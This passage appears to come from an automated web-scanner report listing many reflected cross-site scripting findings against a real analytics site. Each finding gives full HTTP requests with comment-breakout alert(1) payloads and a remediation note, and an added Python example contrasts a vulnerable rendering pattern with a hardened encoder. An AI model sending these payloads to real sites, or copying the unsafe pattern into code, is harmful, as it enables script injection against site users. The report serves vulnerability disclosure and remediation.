User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:07 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:07 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45935
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... .com%2Fmenua149b--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E3766ebdc316%2F18%2FMobile-and-wireless%2FMobile-wireless.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menua149b--><script>alert(1)</script>3766ebdc316/18/Mobile-and-wireless/Mobile-wireless.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload bab5e--><script>alert(1)</script>91f10c172cc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/18bab5e--><script>alert(1)</script>91f10c172cc/Mobile-and-wireless/Mobile-wireless.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:17 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:18 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45935
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... m%2Fmenu%2F18bab5e--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E91f10c172cc%2FMobile-and-wireless%2FMobile-wireless.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/18bab5e--><script>alert(1)</script>91f10c172cc/Mobile-and-wireless/Mobile-wireless.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload 19ada--><script>alert(1)</script>95f6d47511 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/18/Mobile-and-wireless19ada--><script>alert(1)</script>95f6d47511/Mobile-wireless.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:30 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:31 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45933
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... ile-and-wireless19ada--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E95f6d47511%2FMobile-wireless.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/18/Mobile-and-wireless19ada--><script>alert(1)</script>95f6d47511/Mobile-wireless.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload e225f--><script>alert(1)</script>8515afb1e2e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/18/Mobile-and-wireless/Mobile-wireless.htmle225f--><script>alert(1)</script>8515afb1e2e HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:46 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:46 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45935
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... ile-wireless.htmle225f--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E8515afb1e2e&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/18/Mobile-and-wireless/Mobile-wireless.htmle225f--><script>alert(1)</script>8515afb1e2e"> ...[SNIP]...
3.85. http://analytics.informationweek.com/menu/18/Mobile-and-wireless/Mobile-wireless.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://analytics.informationweek.com
Path: /menu/18/Mobile-and-wireless/Mobile-wireless.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 552fb--><script>alert(1)</script>73854b4e76 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/18/Mobile-and-wireless/Mobile-wireless.html?552fb--><script>alert(1)</script>73854b4e76=1 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... eless.html%3F552fb--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E73854b4e76%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/18/Mobile-and-wireless/Mobile-wireless.html?552fb--><script>alert(1)</script>73854b4e76=1"> ...[SNIP]...
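The findings in this section all share one mechanism: a value from the request URI (a path segment or a parameter name) is written verbatim into an HTML comment, and a value containing `-->` terminates that comment so the `<script>` that follows is parsed as markup. The following is an added example, not scanner output and not the application's own code. It shows a triage check of the kind the scanner performs (is the verbatim marker inside an open `<!-- ... -->`?), the vulnerable rendering pattern, and a hardened counterpart that encodes the value so it can never form a comment terminator. The sample body is constructed here; the report elides the exact location of the echo, so the comment shown is an assumption about the template, and every function name is this example's own.

```python
import html
import re

# Constructed sample (not the captured response; the real echo location is
# elided in the report). A debug comment records the requested URI, which is
# the pattern the findings above describe.
PAYLOAD = "552fb--><script>alert(1)</script>73854b4e76"
SAMPLE_BODY = (
    "<html><head>\n"
    "<!-- requested: /menu/18/Mobile-and-wireless/Mobile-wireless.html?"
    + PAYLOAD + "=1 -->\n"
    "<title>Not Found</title></head><body></body></html>"
)

COMMENT_OPEN = "<!--"
# Per the HTML parsing rules both '-->' and '--!>' terminate a comment.
COMMENT_CLOSE_RE = re.compile(r"--!?>")


def comment_breaks_out(value: str) -> bool:
    """True if `value` contains a sequence that would end an enclosing comment."""
    return COMMENT_CLOSE_RE.search(value) is not None


def encode_for_comment(value: str) -> str:
    """Make untrusted text safe to embed inside an HTML comment.

    Character references are not decoded inside comments, so turning '>' into
    '&gt;' removes every terminator ('-->' and '--!>' both need a '>'). Hyphen
    pairs are broken up as well so the output can never contain '--' at all.
    """
    escaped = html.escape(value, quote=True)
    return escaped.replace("--", "-&#45;")


def reflection_context(body: str, marker: str) -> str:
    """Classify where `marker` lands in `body`.

    'comment'  verbatim marker sits inside an unterminated <!-- ... -->
    'unknown'  verbatim marker present, but not inside an open comment
    'encoded'  only the comment-encoded form of the marker is present
    'absent'   marker not echoed in any recognised form
    """
    idx = body.find(marker)
    if idx == -1:
        return "encoded" if encode_for_comment(marker) in body else "absent"
    prefix = body[:idx]
    last_open = prefix.rfind(COMMENT_OPEN)
    if last_open == -1:
        return "unknown"
    # Inside the comment only if nothing terminated it before the marker.
    if COMMENT_CLOSE_RE.search(prefix, last_open + len(COMMENT_OPEN)):
        return "unknown"
    return "comment"


def render_comment_unsafe(value: str) -> str:
    """Vulnerable pattern: the raw request value is interpolated into a comment."""
    return f"<!-- requested: {value} -->"


def render_comment(value: str) -> str:
    """Hardened pattern: encode first, then refuse to emit anything that could
    still terminate the comment (defence in depth against an encoder bug)."""
    safe = encode_for_comment(value)
    if comment_breaks_out(safe):
        raise ValueError("encoded value still contains a comment terminator")
    return f"<!-- requested: {safe} -->"


if __name__ == "__main__":
    print("sample body:", reflection_context(SAMPLE_BODY, PAYLOAD))
    print("unsafe render:", reflection_context(render_comment_unsafe(PAYLOAD), PAYLOAD))
    print("hardened render:", reflection_context(render_comment(PAYLOAD), PAYLOAD))
```

Note that every captured response in this section is a `404 Not Found`, so the check has to be run against the error template as well as the normal page: the echo happens regardless of whether the requested path exists.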
The value of REST URL parameter 1 is copied into an HTML comment. The payload bb584--><script>alert(1)</script>60dd04d670d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menubb584--><script>alert(1)</script>60dd04d670d/19/Network-infrastructure/Network-infrastructure.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:15 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:15 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45955
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... ubb584--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E60dd04d670d%2F19%2FNetwork-infrastructure%2FNetwork-infrastructure.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menubb584--><script>alert(1)</script>60dd04d670d/19/Network-infrastructure/Network-infrastructure.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload aea57--><script>alert(1)</script>9b59d6056e2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/19aea57--><script>alert(1)</script>9b59d6056e2/Network-infrastructure/Network-infrastructure.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:31 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:31 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45955
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... F19aea57--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E9b59d6056e2%2FNetwork-infrastructure%2FNetwork-infrastructure.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/19aea57--><script>alert(1)</script>9b59d6056e2/Network-infrastructure/Network-infrastructure.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload 962ea--><script>alert(1)</script>d1972443112 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/19/Network-infrastructure962ea--><script>alert(1)</script>d1972443112/Network-infrastructure.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:38 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:38 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45955
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... cture962ea--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed1972443112%2FNetwork-infrastructure.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/19/Network-infrastructure962ea--><script>alert(1)</script>d1972443112/Network-infrastructure.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload 40573--><script>alert(1)</script>b96df8e6712 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/19/Network-infrastructure/Network-infrastructure.html40573--><script>alert(1)</script>b96df8e6712 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:48 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:48 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45955
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... re.html40573--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eb96df8e6712&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/19/Network-infrastructure/Network-infrastructure.html40573--><script>alert(1)</script>b96df8e6712"> ...[SNIP]...
3.90. http://analytics.informationweek.com/menu/19/Network-infrastructure/Network-infrastructure.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 4df2a--><script>alert(1)</script>bb132b834aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/19/Network-infrastructure/Network-infrastructure.html?4df2a--><script>alert(1)</script>bb132b834aa=1 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 3F4df2a--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ebb132b834aa%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/19/Network-infrastructure/Network-infrastructure.html?4df2a--><script>alert(1)</script>bb132b834aa=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload fa9da--><script>alert(1)</script>6bac0ed8397 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menufa9da--><script>alert(1)</script>6bac0ed8397/2/Business-continuity/Business-continuity.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:41:16 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:17 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45941
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... m%2Fmenufa9da--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E6bac0ed8397%2F2%2FBusiness-continuity%2FBusiness-continuity.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menufa9da--><script>alert(1)</script>6bac0ed8397/2/Business-continuity/Business-continuity.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload fcfd3--><script>alert(1)</script>e7060e8fad5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/2fcfd3--><script>alert(1)</script>e7060e8fad5/Business-continuity/Business-continuity.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:41:30 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:31 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45941
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 2Fmenu%2F2fcfd3--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ee7060e8fad5%2FBusiness-continuity%2FBusiness-continuity.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/2fcfd3--><script>alert(1)</script>e7060e8fad5/Business-continuity/Business-continuity.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload 9ca2d--><script>alert(1)</script>e052c9eff64 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/2/Business-continuity9ca2d--><script>alert(1)</script>e052c9eff64/Business-continuity.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:41:52 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:52 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45941
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... s-continuity9ca2d--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ee052c9eff64%2FBusiness-continuity.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/2/Business-continuity9ca2d--><script>alert(1)</script>e052c9eff64/Business-continuity.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload 75b36--><script>alert(1)</script>06300418583 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
